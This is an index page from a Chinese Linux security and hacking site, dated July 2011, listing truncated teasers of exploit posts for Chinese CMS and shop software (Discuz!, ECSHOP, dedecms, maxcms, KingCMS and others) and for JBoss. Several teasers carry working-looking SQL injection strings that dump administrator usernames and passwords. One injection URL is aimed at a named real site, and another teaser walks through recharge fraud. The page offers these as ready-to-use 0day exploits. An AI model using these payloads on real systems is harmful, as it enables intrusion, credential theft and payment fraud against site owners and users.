Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

绿色网站无广告
搜索:
您的位置: Linux安全网 > Linux安全 >
  • Linux安全# ZeeAdbox v2x SQL Injection Vulnerability
  • 日期:2011-07-22 点击:195作者: SONIC zeeadbox v2x SQL Injection Vulnerability Name : ZeeAdbox v2x -SQL iNj3cti0n Vulnerabilty Critical Level :VERY HIGH vendor URL : http://www.zeeways.com Author : ..::[ SONiC ]::.. aka ~the_pshyco~ sonicdefence[at]gmail.com Specia
  • Linux安全# Discuz! X1.5 getshell 0day(转)
  • 日期:2011-07-22 点击:211Discuz! X1.5 getshell 0day 直接贴利用代码 ?php print_r(' +---------------------------------------------------------------------------+ Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by toby57 2010.11.05 mail: toby57 at 163 do
  • Linux安全# 星外虚拟主机管理系统刷钱漏洞+注射漏洞
  • 日期:2011-07-22 点击:207测试站: http://www.xiaoweio.cn/ 注册账号,例如:test 访问: http://www.xiaoweio.cn/netpay/ips/ 输入你用户名 以及 充值金额。 例如: test 10元 点下一步,会给你生成一个订单号。比如722978 记住它 参数构造: billno=订单号amount=充值金额date=日
  • Linux安全# ECSHOP 漏洞
  • 日期:2011-07-22 点击:197ECSHOP 搜索型注入exp及后台拿SHELL漏洞 这个是search.php exp 变种 search.php? encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9u
  • Linux安全# 杰奇小说连载系统漏洞
  • 日期:2011-07-22 点击:2131、注册用户 2、进入空间-相册-上传 3、用oprea活firefox修改源码 script type = text/javascript varswfu; SWFUpload.onload = function (){ var settings ={ flash_url:http://www.xxx.com/shuku/modules/space/include/swfupload/swfupload.swf, upload_u
  • Linux安全# dedecms xss oday通杀所有版本
  • 日期:2011-07-22 点击:196dedecms xss oday通杀所有版本(T00ls首发) by haris 作者:haris 漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell 目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。 下面说说利用方法。 条件有2个: 1.开启注册 2.开启投稿 注
  • Linux安全# 风讯网站管理系统 漏洞
  • 日期:2011-07-22 点击:197风讯网站管理系统 任意修改密码漏洞 FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。 漏洞分析: 在文件\User\ GetPassword.asp中: ElseIf Request.Form(Action) = step3 then //第28行 Call step3() Sub step3() //第198行 Dim p
  • Linux安全# Discuz! X2.0 SQL注入漏洞 EXP
  • 日期:2011-07-22 点击:222程序版本: Discuz! X2 DZ2.0直接暴管理账号密码(默认前缀的情况下) /forum.php?mod=attachmentfindpost=ssaid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd 29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3
  • Linux安全# PHPCMS错误报告页面跨站脚本漏洞
  • 日期:2011-07-22 点击:198统错误报告页面存在跨站脚本漏洞 影响版本: PHPCMS ALL VERSION 程序介绍: PHPCMS是一款基于 PHP+Mysql 架构的网站内容管理系统,也是一个开源的 PHP 开发平台。Phpcms 采用模块化方式开发,功能易用便于扩展,可面向大中型站点提供重量级网站建设解决方案。
  • Linux安全# maxcmsSQL注入漏洞解析
  • 日期:2011-07-22 点击:195这个系统是国内非常流行的视频点播系统,之前的1.5版本漏洞非常多,2.0版本在安全方面有所提高,但是依然有漏洞存在。 看代码 \inc\ajax. asp dimaction:action=getForm( action , get ) response.Charset= gbk Select caseaction case newslist :viewNewsLi
  • Linux安全# KingCMS ASP 5.0/5.1漏洞利用方法
  • 日期:2011-07-22 点击:205KingCMS ASP是基于ASP+ACCESS构架的一款很不错的CMS系统,前台全部静态化处理,新一代 KingCMS 提供了更好的界面、更多的开发余地、更强大的扩展能力,现今也受到不少站长的欢迎。但是在没有正确设置系统的情况下会爆出一个致命的弱点,特别是针对比较懒的站
  • Linux安全# maxcms管理员认证绕过漏洞
  • 日期:2011-07-22 点击:204maxcms后台有自动升级功能,ajax的那个注射被修补了,但是这个漏洞还是没有修补。 在上一贴有同学问是否能绕过认证,答案是肯定的,但是前提是要知道后台目录地址 回顾下漏洞代码 Sub checkPower dimloginValidate,rsObj:loginValidate= maxcms2.0 err.clear
  • Linux安全# 远古视频点播系统的一个注入漏洞
  • 日期:2011-07-22 点击:202VIEWGOOD VOD视频点播系统 (WebVOD) 漏洞产生于文件/webmedia/oemui/user/guest. asp ,访问这个页面需要注册 相关代码: szAgent=Request.ServerVariables( HTTP_USER_AGENT ) aTmpInfo=Split(szAgent, ( ,-1,1) aAgentInfo=Split(aTmpInfo(1), ; ,-1,1) sz
  • Linux安全# exp
  • 日期:2011-07-22 点击:199http://radicalshell.net http://www.oreillynet.com/linux/cmd/cmd.csp?path=d/dnssec-signzone http://www.phrack.org/ - retired http://www.blackcode.com/ http://portwolf.com/ http://www.illmob.org/ ; V5 |0 H7 D, c- m! Y http://neworder.box.sk/
  • Linux安全# JBoss遍历漏洞
  • 日期:2011-07-22 点击:235JBoss应用服务器DeploymentFileRepository类目录遍历漏洞 影响版本: jboss Application Server 4.0.4 程序介绍: Jboss是非常流行的开源J2EE应用服务器。 漏洞分析: JBoss应用服务器的DeploymentFileRepository类没有正确地过滤用户提供输入,通过认证的远程
  • Linux安全# Sablog-X 2.0 后台管理权限欺骗漏洞解析
  • 日期:2011-07-22 点击:193前不久80vul.com公布了sax2.0的一个漏洞,随后4ngel发布了补丁,不过权限验证部分的代码还是存在问题,下面就来简单说说这个漏洞:D cp. php if (! $sax_uid ||! $sax_pw ||! $sax_logincount ||! $sax_hash ){ //只要这个条件不满足,就可以通过后台的权限验证了
  • Linux安全# 无忧购物时尚ASP版注入漏洞
  • 日期:2011-07-22 点击:195作者: JcBolg,利用: http://www.xiaoweio.cn/wyshop/TEXTBOX.ASP?action=modifynews%69d=122%20and%201=2%20union%20select%201,2,3,admin%2bpassword,5,6,7,8%20from%20shop_admin 拿到用户名和密码,解密,进入后台,找上传点,存在着上传漏洞,直接拿she
  • Linux安全# EC_word企业管理系统注入漏洞及修复
  • 日期:2011-07-22 点击:196EC_word企业管理系统注入漏洞及修复 文章录入:叶孤城 责任编辑:2cto.com 更新时间:2011-7-9 10:49:07 41 【字体:小 大】 该程序采用枫叶通用防注入1.0asp版,此防注入完全鸡肋,该网站程序pro_show.asp有cookies注入或者变型注入,注入前可以先判断一下
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史